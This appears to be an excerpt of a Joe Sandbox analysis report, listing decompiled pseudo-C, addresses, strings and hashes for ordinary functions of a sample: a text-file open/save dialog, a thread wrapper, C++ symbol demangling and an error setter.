Part of subcall function 00416590: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,0040EF30,0040EF44,?,?,004168E7), ref: 004165D3

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: CriticalSection$DeleteLeave$CloseEnterHandle$DecrementInterlockedfree
String ID:
API String ID: 2614691852-0
Opcode ID: 10d2e47235c33a10f307eab6fba7a2750502e1a8a3a0ce621bbac8bbba1721c3
Instruction ID: 1c191d0dd0adc589239668a28d7ae89f025c8aa7f2191fcd58db01b9eefcd2da
Opcode Fuzzy Hash: 10d2e47235c33a10f307eab6fba7a2750502e1a8a3a0ce621bbac8bbba1721c3
Instruction Fuzzy Hash: 42514AB1A043048FCB10EF69D5842AEBBF4EF84310F52493AD85997355E778E885CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00401879 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E00401879(struct HWND__* _a4, intOrPtr _a8) {
				void* _v16;
				char _v28;
				char _v288;
				char* _v316;
				intOrPtr _v324;
				intOrPtr _v344;
				char* _v348;
				char* _v364;
				struct HWND__* _v372;
				void _v376;
				char _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				int _v428;
				char _v432;
				int _v436;
				void* _v452;
				void* _v456;
				char _v460;
				intOrPtr _v464;
				char* _v468;
				intOrPtr* _t55;
				signed int _t64;
				int _t66;
				struct HWND__* _t72;
				signed int _t80;
				struct HWND__* _t84;
				void* _t92;
				intOrPtr _t93;
				void* _t94;
				intOrPtr* _t96;
				void* _t98;
				struct HWND__** _t99;

				_t93 = _t92 - 0x1bc;
				_v408 = E00418AA0;
				_v404 = 0x419100;
				_t55 =  &_v400;
				_t90 =  &_v28;
				 *_t55 =  &_v28;
				_t91 = E00401A65;
				 *((intOrPtr*)(_t55 + 4)) = E00401A65;
				 *((intOrPtr*)(_t55 + 8)) = _t93;
				E0040E1A0( &_v28, E00401A65,  &_v432);
				memset( &_v376, 0, 0x58);
				_v288 = 0;
				_v376 = 0x58;
				_v372 = _a4;
				_v364 = "Text Files (*.txt)";
				_v348 =  &_v288;
				_v344 = 0x104;
				_v316 = "txt";
				if(_a8 == 0) {
					_v324 = 0x81004;
					_v460 =  &_v376;
					_v428 = 1;
					_t64 = GetOpenFileNameA(??);
					_t94 = _t93 - 4;
					if((_t64 & 0xffffff00 | GetOpenFileNameA != 0x00000000) == 0) {
						goto L7;
					} else {
						_t72 = GetDlgItem(_a4, 0x3e9);
						_t96 = _t94 - 8;
						_t91 =  &_v288;
						_v468 =  &_v288;
						 *_t96 = _t72;
						if((E00401520() & 0xffffff00 | _t73 == 0x00000000) == 0) {
							goto L7;
						} else {
							_v460 = 0x30;
							_v464 = "Error";
							_v468 = "Load of file failed.";
							 *_t96 = _a4;
							MessageBoxA(??, ??, ??, ??);
							_t66 = 0;
						}
					}
				} else {
					_v324 = 0x80806;
					_v460 =  &_v376;
					_v428 = 1;
					_t80 = GetSaveFileNameA(??);
					_t98 = _t93 - 4;
					if((_t80 & 0xffffff00 | GetSaveFileNameA != 0x00000000) == 0) {
						L7:
						_t66 = 1;
					} else {
						_t84 = GetDlgItem(_a4, 0x3e9);
						_t99 = _t98 - 8;
						_t91 =  &_v288;
						_v468 =  &_v288;
						 *_t99 = _t84;
						if((E004016D2() & 0xffffff00 | _t85 == 0x00000000) == 0) {
							goto L7;
						} else {
							_v460 = 0x30;
							_v464 = "Error";
							_v468 = "Save file failed.";
							 *_t99 = _a4;
							MessageBoxA(??, ??, ??, ??);
							_t66 = 0;
						}
					}
				}
				_v436 = _t66;
				E0040E320(_t90, _t91,  &_v432);
				return _v436;
			}

0x0040187f
0x00401885
0x0040188f
0x00401899
0x0040189f
0x004018a2
0x004018a4
0x004018a9
0x004018ac
0x004018b8
0x004018d6
0x004018db
0x004018e2
0x004018ef
0x004018f5
0x00401905
0x0040190b
0x00401915
0x00401923
0x004019c6
0x004019d6
0x004019de
0x004019e8
0x004019ea
0x004019f4
0x00000000
0x004019f6
0x00401a09
0x00401a0b
0x00401a0e
0x00401a14
0x00401a18
0x00401a27
0x00000000
0x00401a29
0x00401a29
0x00401a31
0x00401a39
0x00401a44
0x00401a4c
0x00401a51
0x00401a51
0x00401a27
0x00401929
0x00401929
0x00401939
0x00401941
0x0040194b
0x0040194d
0x00401957
0x00401a58
0x00401a58
0x0040195d
0x00401970
0x00401972
0x00401975
0x0040197b
0x0040197f
0x0040198e
0x00000000
0x00401994
0x00401994
0x0040199c
0x004019a4
0x004019af
0x004019b7
0x004019bc
0x004019bc
0x0040198e
0x00401957
0x00401a5d
0x00401a89
0x00401a9b

APIs

memset.NTDLL ref: 004018D6

Strings

X, xrefs: 004018E2
Error, xrefs: 0040199C, 00401A31
txt, xrefs: 00401915
X, xrefs: 004018BD
Load of file failed., xrefs: 00401A39
Text Files (*.txt), xrefs: 004018F5
Save file failed., xrefs: 004019A4
0, xrefs: 00401A29

Memory Dump Source

Source File: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: memset
String ID: 0$Error$Load of file failed.$Save file failed.$Text Files (*.txt)$X$X$txt
API String ID: 2221118986-4035221783
Opcode ID: 123245c011ebb60f00026e2333eb700c91498b7a70da1c347f03b1a05bee33b3
Instruction ID: 791b6864530678cd1946ed1b94040bc6d96a798256f3efdc208ed694a97620fc
Opcode Fuzzy Hash: 123245c011ebb60f00026e2333eb700c91498b7a70da1c347f03b1a05bee33b3
Instruction Fuzzy Hash: 47510AB0905308DFDB10EF25C9847C9BBF4AF45344F4084AAE89CAB351D7789A89CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00410C89 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 106threadCOMMON

Download Yara Rule

APIs

TlsSetValue.KERNEL32 ref: 00410CEE
GetCurrentThreadId.KERNEL32 ref: 00410CF7
_setjmp3.MSVCRT ref: 00410D1F
CloseHandle.KERNEL32 ref: 00410D97
_endthreadex.MSVCRT(00000000,00000000), ref: 00410E04

Part of subcall function 00410280: fprintf.MSVCRT ref: 004102C0

Strings

h%, xrefs: 00410C98, 00410D26, 00410D50, 00410DEC, 00410E2C
X%, xrefs: 00410CBE

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: CloseCurrentHandleThreadValue_endthreadex_setjmp3fprintf
String ID: X%$h%
API String ID: 2387900098-2111123251
Opcode ID: afb67a9da1f32ea5b8055769f7c37646c4bbc43da5d0144652c704a0bd7a2f59
Instruction ID: 13198fc10ca4ea6836e7e92751527e6844c2fb09f0a62ae1e1a6dff033c7f563
Opcode Fuzzy Hash: afb67a9da1f32ea5b8055769f7c37646c4bbc43da5d0144652c704a0bd7a2f59
Instruction Fuzzy Hash: D941F9747047059FCB10EF66D588A9A7BF4AF04344F45886DE8889B312D778E9C1CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C550 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 206
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040C550(signed int __eax, intOrPtr __ecx, intOrPtr __edx) {
				void* _v16;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v320;
				char _v324;
				char _v328;
				char _v332;
				signed int _v336;
				char _v340;
				char* _v344;
				intOrPtr _v348;
				char _v352;
				char* _v356;
				signed char* _v360;
				signed char _v364;
				intOrPtr _v368;
				char _v372;
				intOrPtr _v384;
				intOrPtr _v388;
				signed int _v392;
				char _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				signed int _t88;
				signed int _t90;
				void* _t96;
				void* _t99;
				signed int _t102;
				intOrPtr _t107;
				signed int _t112;
				signed int _t124;
				int _t125;
				signed int _t128;
				signed int _t129;
				signed char* _t130;
				char* _t131;
				signed char* _t135;
				signed char* _t136;
				signed int _t140;
				signed int _t141;
				signed int _t142;
				void* _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed char* _t162;
				void* _t163;
				signed char* _t165;
				void* _t169;
				void* _t170;
				intOrPtr* _t171;
				intOrPtr* _t173;
				void* _t175;
				void* _t183;

				_t88 = __eax;
				_t130 = __eax;
				_t171 = _t170 - 0x18c;
				_v384 = __edx;
				_t147 =  *__eax & 0x000000ff;
				_v388 = __ecx;
				_t175 = _t147 - 0x5f;
				if(_t175 == 0) {
					_t163 = 1;
					if( *((char*)(__eax + 1)) != 0x5a) {
						goto L1;
					}
					L8:
					 *_t171 = _t130;
					_v392 = _t147;
					_t90 = strlen(??);
					_v372 = _t130;
					_v364 = 0x11;
					_v360 = _t130;
					_v352 = 0;
					_v340 = 0;
					_t141 = _t90;
					_v368 = _t130 + _t90;
					_v348 = _t141 + _t141;
					_v336 = _t141;
					_v332 = 0;
					_v328 = 0;
					_v324 = 0;
					_t96 = E0040DB20(0x00000012 + (_t141 + _t141 + _t141 * 0x00000004) * 0x00000004 & 0xfffffff0);
					_t99 = E0040DB20(0x00000012 + _t141 * 0x00000004 & 0xfffffff0);
					_t148 = _v392;
					_t173 = _t171 - _t96 - _t99;
					_t183 = _t163 - 1;
					_v356 =  &_v400;
					_v344 =  &_v400;
					if(_t183 == 0) {
						_t142 = 0;
						if(_t148 == 0x5f) {
							_t148 =  *(_t130 + 1) & 0x000000ff;
							_v360 = _t130 + 1;
							if(_t148 != 0x5a) {
								goto L20;
							}
							_v360 = _t130 + 2;
							_t133 =  &_v372;
							_t142 = E00406810( &_v372, 1);
							if((_v364 & 0x00000001) != 0) {
								while(1) {
									_t165 = _v360;
									_t148 =  *_t165 & 0x000000ff;
									if(_t148 != 0x2e) {
										goto L20;
									}
									_t112 = _t165[1] & 0x000000ff;
									_t85 = _t112 - 0x61; // -7
									if(_t85 <= 0x19 || _t112 == 0x5f || _t112 - 0x30 <= 9) {
										_t142 = E00405190(_t133, _t142);
										continue;
									} else {
										_t148 =  *_t165 & 0x000000ff;
										goto L20;
									}
								}
								goto L20;
							}
							_t148 =  *_v360 & 0x000000ff;
						}
						goto L20;
					} else {
						if(_t183 < 0 || _t163 > 3) {
							_t142 = E00405ED0( &_v372);
							_t148 =  *_v360 & 0x000000ff;
						} else {
							_t162 = _t130 + 0xb;
							_v360 = _t162;
							if( *((char*)(_t130 + 0xb)) != 0x5f ||  *((char*)(_t130 + 0xc)) != 0x5a) {
								 *_t173 = _t162;
								_t134 =  &_v372;
								_t144 = E00404FF0( &_v372, strlen(??), _t162);
							} else {
								_v360 = _t130 + 0xd;
								_t134 =  &_v372;
								_t144 = E00406810( &_v372, 0);
							}
							 *_t173 = 0;
							_t124 = E00404F90(_t134, _t144, (0 | _t163 != 0x00000002) + 0x42);
							_t135 = _v360;
							 *_t173 = _t135;
							_v392 = _t124;
							_t125 = strlen(??);
							_t142 = _v392;
							_t136 = _t135 + _t125;
							_v360 = _t136;
							_t148 =  *_t136 & 0x000000ff;
						}
						L20:
						_t102 = 0;
						if(_t148 == 0 && _t142 != 0) {
							_t131 =  &_v320;
							_v64 = 0;
							_v60 = 0;
							_v48 = 0;
							_v56 = _v384;
							_v44 = 0;
							_v36 = 0;
							_v32 = 0;
							_v52 = _v388;
							_v40 = 0;
							E004079F0(_t131, _t142, 0x11);
							_t107 = _v64;
							 *_t173 = _t131;
							 *((char*)(_t169 + _t107 - 0x13c)) = 0;
							_v404 = _v52;
							_v408 = _t107;
							_v56();
							_t102 = 0 | _v40 == 0x00000000;
						}
						return _t102;
					}
				}
				L1:
				asm("repe cmpsb");
				_t140 = 0 | _t175 > 0x00000000;
				_t163 = 0;
				if(_t140 != (_t88 & 0xffffff00 | _t175 > 0x00000000)) {
					goto L8;
				}
				_t128 =  *(_t130 + 8) & 0x000000ff;
				if(_t128 == 0x2e || _t128 == 0x5f) {
					L4:
					_t129 =  *(_t130 + 9) & 0x000000ff;
					_t10 = _t129 == 0x49;
					_t145 = _t140 & 0xffffff00 | _t10;
					if(_t10 == 0) {
						L6:
						_t163 = 0;
						if( *((char*)(_t130 + 0xa)) == 0x5f) {
							_t163 = (_t145 << 0x1f >> 0x1f) + 3;
						}
						goto L8;
					}
					_t163 = 0;
					if(_t129 != 0x44) {
						goto L8;
					}
					goto L6;
				} else {
					if(_t128 != 0x24) {
						goto L8;
					}
					goto L4;
				}
			}

0x0040c550
0x0040c556
0x0040c558
0x0040c55e
0x0040c564
0x0040c567
0x0040c56d
0x0040c570
0x0040c714
0x0040c719
0x00000000
0x00000000
0x0040c5c0
0x0040c5c0
0x0040c5c3
0x0040c5c9
0x0040c5ce
0x0040c5d4
0x0040c5de
0x0040c5e4
0x0040c5ee
0x0040c5f8
0x0040c5fd
0x0040c606
0x0040c619
0x0040c61f
0x0040c629
0x0040c633
0x0040c63d
0x0040c652
0x0040c657
0x0040c65d
0x0040c65f
0x0040c666
0x0040c66c
0x0040c672
0x0040c725
0x0040c72a
0x0040c7f0
0x0040c7f7
0x0040c800
0x00000000
0x00000000
0x0040c80e
0x0040c814
0x0040c828
0x0040c82a
0x0040c84b
0x0040c84b
0x0040c851
0x0040c857
0x00000000
0x00000000
0x0040c85d
0x0040c861
0x0040c867
0x0040c849
0x00000000
0x0040c874
0x0040c874
0x00000000
0x0040c874
0x0040c867
0x00000000
0x0040c84b
0x0040c832
0x0040c832
0x00000000
0x0040c678
0x0040c678
0x0040c7cb
0x0040c7d3
0x0040c687
0x0040c68b
0x0040c68e
0x0040c694
0x0040c6a0
0x0040c6a3
0x0040c6b9
0x0040c880
0x0040c885
0x0040c88b
0x0040c898
0x0040c898
0x0040c6c8
0x0040c6cf
0x0040c6d4
0x0040c6da
0x0040c6dd
0x0040c6e3
0x0040c6e8
0x0040c6ee
0x0040c6f0
0x0040c6f6
0x0040c6f6
0x0040c730
0x0040c730
0x0040c734
0x0040c740
0x0040c74b
0x0040c752
0x0040c756
0x0040c75d
0x0040c766
0x0040c76d
0x0040c774
0x0040c77b
0x0040c780
0x0040c787
0x0040c78c
0x0040c792
0x0040c795
0x0040c79d
0x0040c7a1
0x0040c7a5
0x0040c7af
0x0040c7af
0x0040c7b9
0x0040c7b9
0x0040c672
0x0040c576
0x0040c582
0x0040c584
0x0040c58a
0x0040c58e
0x00000000
0x00000000
0x0040c590
0x0040c596
0x0040c5a0
0x0040c5a0
0x0040c5a6
0x0040c5a6
0x0040c5a9
0x0040c5b1
0x0040c5b1
0x0040c5b7
0x0040c7e8
0x0040c7e8
0x00000000
0x0040c5b7
0x0040c5ab
0x0040c5af
0x00000000
0x00000000
0x00000000
0x0040c700
0x0040c702
0x00000000
0x00000000
0x00000000
0x0040c708

APIs

strlen.NTDLL ref: 0040C5C9
strlen.NTDLL ref: 0040C6A9
strlen.NTDLL ref: 0040C6E3

Strings

Z, xrefs: 0040C696
_GLOBAL_, xrefs: 0040C57D
_, xrefs: 0040C687
Z__, xrefs: 0040C7B2
_, xrefs: 0040C5B3

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: strlen
String ID: Z$Z__$_$_$_GLOBAL_
API String ID: 39653677-4292778781
Opcode ID: 5dfc0af7898a74114177fdc361a86ebfdee3aed8319054be729a6730491e01d0
Instruction ID: c40dabd319674bd2cc0e0cae16437056d9595a4bb6a0433c78e95727e65cb020
Opcode Fuzzy Hash: 5dfc0af7898a74114177fdc361a86ebfdee3aed8319054be729a6730491e01d0
Instruction Fuzzy Hash: 5C815D75D04269CBDB20DF29C8C43DABBF1AB45304F4482BAD449BB382D7399E858F95

Uniqueness

Uniqueness Score: -1.00%

Function 100014A0 Relevance: 12.2, APIs: 8, Instructions: 171COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 100014DB
SetLastError.KERNEL32(0000007F), ref: 10001507

Memory Dump Source

Source File: 00000000.00000002.670998844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_6gjnnBAbpc.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 29cfafdec3d3a1262f4827b6cae24ea1b9a18653203c5f05ee1a645c7d2a8912
Instruction ID: 25e538b33cc42fa1af6dbc26f5ecb21efd633c51d41fb312bc782d6f26faee88
Opcode Fuzzy Hash: 29cfafdec3d3a1262f4827b6cae24ea1b9a18653203c5f05ee1a645c7d2a8912
Instruction Fuzzy Hash: 1871F874E04109EFEB08DF94C990AAEB7B2FF48345F248598E915AB345D735EE81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0040C545 Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 142
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040C545(signed int __eax, intOrPtr __ecx, intOrPtr __edx) {
				void* _v16;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v320;
				char _v324;
				char _v328;
				char _v332;
				signed int _v336;
				char _v340;
				char* _v344;
				intOrPtr _v348;
				char _v352;
				char* _v356;
				signed char* _v360;
				signed char _v364;
				intOrPtr _v368;
				char _v372;
				intOrPtr _v384;
				intOrPtr _v388;
				signed int _v392;
				char _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				signed int _t88;
				signed int _t90;
				void* _t96;
				void* _t99;
				signed int _t102;
				intOrPtr _t107;
				signed int _t112;
				signed int _t124;
				int _t125;
				signed int _t128;
				signed int _t129;
				signed char* _t131;
				char* _t133;
				signed char* _t137;
				signed char* _t138;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				void* _t146;
				signed int _t147;
				signed int _t149;
				signed int _t150;
				signed char* _t166;
				void* _t168;
				signed char* _t171;
				void* _t176;
				void* _t178;
				intOrPtr* _t179;
				intOrPtr* _t181;
				void* _t183;
				void* _t191;

				_t88 = __eax;
				_t176 = _t178;
				_t131 = __eax;
				_t179 = _t178 - 0x18c;
				_v384 = __edx;
				_t149 =  *__eax & 0x000000ff;
				_v388 = __ecx;
				_t183 = _t149 - 0x5f;
				if(_t183 == 0) {
					_t168 = 1;
					if( *((char*)(__eax + 1)) != 0x5a) {
						goto L2;
					}
					goto L9;
				} else {
					L2:
					asm("repe cmpsb");
					_t142 = 0 | _t183 > 0x00000000;
					_t168 = 0;
					if(_t142 != (_t88 & 0xffffff00 | _t183 > 0x00000000)) {
						L9:
						 *_t179 = _t131;
						_v392 = _t149;
						_t90 = strlen(??);
						_v372 = _t131;
						_v364 = 0x11;
						_v360 = _t131;
						_v352 = 0;
						_v340 = 0;
						_t143 = _t90;
						_v368 = _t131 + _t90;
						_v348 = _t143 + _t143;
						_v336 = _t143;
						_v332 = 0;
						_v328 = 0;
						_v324 = 0;
						_t96 = E0040DB20(0x00000012 + (_t143 + _t143 + _t143 * 0x00000004) * 0x00000004 & 0xfffffff0);
						_t99 = E0040DB20(0x00000012 + _t143 * 0x00000004 & 0xfffffff0);
						_t150 = _v392;
						_t181 = _t179 - _t96 - _t99;
						_t191 = _t168 - 1;
						_v356 =  &_v400;
						_v344 =  &_v400;
						if(_t191 == 0) {
							_t144 = 0;
							if(_t150 == 0x5f) {
								_t150 =  *(_t131 + 1) & 0x000000ff;
								_v360 = _t131 + 1;
								if(_t150 != 0x5a) {
									goto L21;
								}
								_v360 = _t131 + 2;
								_t135 =  &_v372;
								_t144 = E00406810( &_v372, 1);
								if((_v364 & 0x00000001) != 0) {
									while(1) {
										_t171 = _v360;
										_t150 =  *_t171 & 0x000000ff;
										if(_t150 != 0x2e) {
											goto L21;
										}
										_t112 = _t171[1] & 0x000000ff;
										_t85 = _t112 - 0x61; // -7
										if(_t85 <= 0x19 || _t112 == 0x5f || _t112 - 0x30 <= 9) {
											_t144 = E00405190(_t135, _t144);
											continue;
										} else {
											_t150 =  *_t171 & 0x000000ff;
											goto L21;
										}
									}
									goto L21;
								}
								_t150 =  *_v360 & 0x000000ff;
							}
							L21:
							_t102 = 0;
							if(_t150 == 0 && _t144 != 0) {
								_t133 =  &_v320;
								_v64 = 0;
								_v60 = 0;
								_v48 = 0;
								_v56 = _v384;
								_v44 = 0;
								_v36 = 0;
								_v32 = 0;
								_v52 = _v388;
								_v40 = 0;
								E004079F0(_t133, _t144, 0x11);
								_t107 = _v64;
								 *_t181 = _t133;
								 *((char*)(_t176 + _t107 - 0x13c)) = 0;
								_v404 = _v52;
								_v408 = _t107;
								_v56();
								_t102 = 0 | _v40 == 0x00000000;
							}
							return _t102;
						}
						if(_t191 < 0 || _t168 > 3) {
							_t144 = E00405ED0( &_v372);
							_t150 =  *_v360 & 0x000000ff;
						} else {
							_t166 = _t131 + 0xb;
							_v360 = _t166;
							if( *((char*)(_t131 + 0xb)) != 0x5f ||  *((char*)(_t131 + 0xc)) != 0x5a) {
								 *_t181 = _t166;
								_t136 =  &_v372;
								_t146 = E00404FF0( &_v372, strlen(??), _t166);
							} else {
								_v360 = _t131 + 0xd;
								_t136 =  &_v372;
								_t146 = E00406810( &_v372, 0);
							}
							 *_t181 = 0;
							_t124 = E00404F90(_t136, _t146, (0 | _t168 != 0x00000002) + 0x42);
							_t137 = _v360;
							 *_t181 = _t137;
							_v392 = _t124;
							_t125 = strlen(??);
							_t144 = _v392;
							_t138 = _t137 + _t125;
							_v360 = _t138;
							_t150 =  *_t138 & 0x000000ff;
						}
						goto L21;
					}
					_t128 =  *(_t131 + 8) & 0x000000ff;
					if(_t128 == 0x2e || _t128 == 0x5f) {
						L5:
						_t129 =  *(_t131 + 9) & 0x000000ff;
						_t10 = _t129 == 0x49;
						_t147 = _t142 & 0xffffff00 | _t10;
						if(_t10 == 0) {
							L7:
							_t168 = 0;
							if( *((char*)(_t131 + 0xa)) == 0x5f) {
								_t168 = (_t147 << 0x1f >> 0x1f) + 3;
							}
							goto L9;
						}
						_t168 = 0;
						if(_t129 != 0x44) {
							goto L9;
						}
						goto L7;
					} else {
						if(_t128 != 0x24) {
							goto L9;
						}
						goto L5;
					}
				}
			}

0x0040c545
0x0040c551
0x0040c556
0x0040c558
0x0040c55e
0x0040c564
0x0040c567
0x0040c56d
0x0040c570
0x0040c714
0x0040c719
0x00000000
0x00000000
0x00000000
0x0040c576
0x0040c576
0x0040c582
0x0040c584
0x0040c58a
0x0040c58e
0x0040c5c0
0x0040c5c0
0x0040c5c3
0x0040c5c9
0x0040c5ce
0x0040c5d4
0x0040c5de
0x0040c5e4
0x0040c5ee
0x0040c5f8
0x0040c5fd
0x0040c606
0x0040c619
0x0040c61f
0x0040c629
0x0040c633
0x0040c63d
0x0040c652
0x0040c657
0x0040c65d
0x0040c65f
0x0040c666
0x0040c66c
0x0040c672
0x0040c725
0x0040c72a
0x0040c7f0
0x0040c7f7
0x0040c800
0x00000000
0x00000000
0x0040c80e
0x0040c814
0x0040c828
0x0040c82a
0x0040c84b
0x0040c84b
0x0040c851
0x0040c857
0x00000000
0x00000000
0x0040c85d
0x0040c861
0x0040c867
0x0040c849
0x00000000
0x0040c874
0x0040c874
0x00000000
0x0040c874
0x0040c867
0x00000000
0x0040c84b
0x0040c832
0x0040c832
0x0040c730
0x0040c730
0x0040c734
0x0040c740
0x0040c74b
0x0040c752
0x0040c756
0x0040c75d
0x0040c766
0x0040c76d
0x0040c774
0x0040c77b
0x0040c780
0x0040c787
0x0040c78c
0x0040c792
0x0040c795
0x0040c79d
0x0040c7a1
0x0040c7a5
0x0040c7af
0x0040c7af
0x0040c7b9
0x0040c7b9
0x0040c678
0x0040c7cb
0x0040c7d3
0x0040c687
0x0040c68b
0x0040c68e
0x0040c694
0x0040c6a0
0x0040c6a3
0x0040c6b9
0x0040c880
0x0040c885
0x0040c88b
0x0040c898
0x0040c898
0x0040c6c8
0x0040c6cf
0x0040c6d4
0x0040c6da
0x0040c6dd
0x0040c6e3
0x0040c6e8
0x0040c6ee
0x0040c6f0
0x0040c6f6
0x0040c6f6
0x00000000
0x0040c678
0x0040c590
0x0040c596
0x0040c5a0
0x0040c5a0
0x0040c5a6
0x0040c5a6
0x0040c5a9
0x0040c5b1
0x0040c5b1
0x0040c5b7
0x0040c7e8
0x0040c7e8
0x00000000
0x0040c5b7
0x0040c5ab
0x0040c5af
0x00000000
0x00000000
0x00000000
0x0040c700
0x0040c702
0x00000000
0x00000000
0x00000000
0x0040c708
0x0040c596

APIs

strlen.NTDLL ref: 0040C5C9
strlen.NTDLL ref: 0040C6A9
strlen.NTDLL ref: 0040C6E3

Strings

Z, xrefs: 0040C696
_GLOBAL_, xrefs: 0040C57D
_, xrefs: 0040C687
Z__, xrefs: 0040C7B2
_, xrefs: 0040C5B3

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: strlen
String ID: Z$Z__$_$_$_GLOBAL_
API String ID: 39653677-4292778781
Opcode ID: 0ad0a61377d16953e720fc486ce5b331837087ab9875d8e2a4921e5e519b7121
